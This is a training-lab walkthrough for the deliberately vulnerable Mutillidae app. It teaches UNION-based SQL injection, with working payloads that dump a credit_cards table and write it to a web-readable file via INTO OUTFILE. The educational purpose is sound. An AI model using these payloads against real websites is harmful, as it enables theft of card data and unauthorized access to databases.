OWASP Top 10 Web Hacking Final Lab 9 SQL Injection Union Exploit #2 (Create Output File)

{ SQL Injection Union Exploit #2 (Create Output File) }

---

OWASP Top 10 Web Hacking Final  Lab 9

Start Web Browser Session to Mutillidae

1. On BackTrack, Open Firefox
   • Instructions:
     1. Click on the Firefox Icon
   • Notes (FYI):
     • If FireFox Icon does not exist in the Menu Bar Tray, then go to Applications --> Internet --> Firefox Web Browser
2. Open Mutillidae
   • Notes (FYI):
     • Replace 192.168.1.111 in the following URL --> http://192.168.1.111/mutillidae, with your Mutillidae's IP Address obtained from (Section 3, Step 3)
   • Instructions:
     1. http://192.168.1.111/mutillidae

Section 9. Go To User Info Page

1. Go to User Info
   • Instructions:
     1. OWASP Top 10 --> A1 - SQL Injection --> SQLi - Extract Data --> User Info

Section 15. SQL Injection (Refresher Union Examples)

1. Inspect the Name Textbox with Firebug
   • Instructions:
     1. Right click on the Name Textbox
     2. Click on Inspect Element
2. Change Text Box Size
   • Instructions:
     1. After the string "size=", Change 20 to 100. (See Picture)
     2. Click on the Close Button
3. Second Union SQL Injection Attempt
   • Instructions:
     1. In the Name Textbox place the following string.  Remember to put a space after the "-- ".
        • ' union select ccid,ccnumber,ccv,expiration,null from credit_cards --
     2. Click the View Account Details button
   • Note(FYI):
     1. The goal with this union statement is to map out which fields in the database align with the above numbers when the output is displayed.
4. Viewing the Results
   • Note(FYI):
     1. Scroll down and notice that Username is populated with a credit card number, Password is populated with the CCV, and Signature is populated with the expiration.
        • Username=4444111122223333
        • Password=745
        • Signature=2012-03-01
     2. Congrats, you successful manipulated a "purposeful" bug in the user-info.php script, to display credit card information using a query meant for the accounts table.
   • Instructions:
     1. View the Results

Section 16. SQL Injection (Union Example with Curl #5)

1. Go to User Info
   • Instructions:
     1. OWASP Top 10 --> A1 - SQL Injection --> SQLi - Extract Data --> User Info
2. Inspect the Name Textbox with Firebug
   • Instructions:
     1. Right click on the Name Textbox
     2. Click on Inspect Element
3. Change Text Box Size
   • Instructions:
     1. After the string "size=", Change 20 to 100. (See Picture)
     2. Click on the Close Button
4. Execute MySQL Union Injection
   • Note(FYI):
     1. Remember to put a space after the "-- ".
   • Instructions:
     1. Place the below Injection String in the Name Textbox
        • ' union select ccid,ccnumber,ccv,expiration,null from credit_cards INTO OUTFILE '/var/www/html/mutillidae/CCN.txt' FIELDS TERMINATED BY ',' OPTIONALLY ENCLOSED BY '"' LINES TERMINATED BY '\n' --
     2. Click the View Account Details Button
5. View Results Page
   • Instructions:
     1. At first you would think that causing an Authentication Error would not result in any other action aside from printing a message to the screen.
     2. Although the second message says results were found, they were actually written to a file instead of being displayed to the screen.
     3. Open a new tab
6. View Union Injection Output File
   • Notes(FYI):
     1. Replace 192.168.1.111 in the below URL with your Mutillidae's IP Address obtained from (Section 3, Step 3)
   • Instructions:
     1. Place the following URL in the Address Textbox
        • http://192.168.1.111/mutillidae/CCN.txt

Section 17. Proof of Lab

1. Proof of Lab : Các bạn hãy quay lại toàn bộ quá trình thực hành, với text note có tên của mình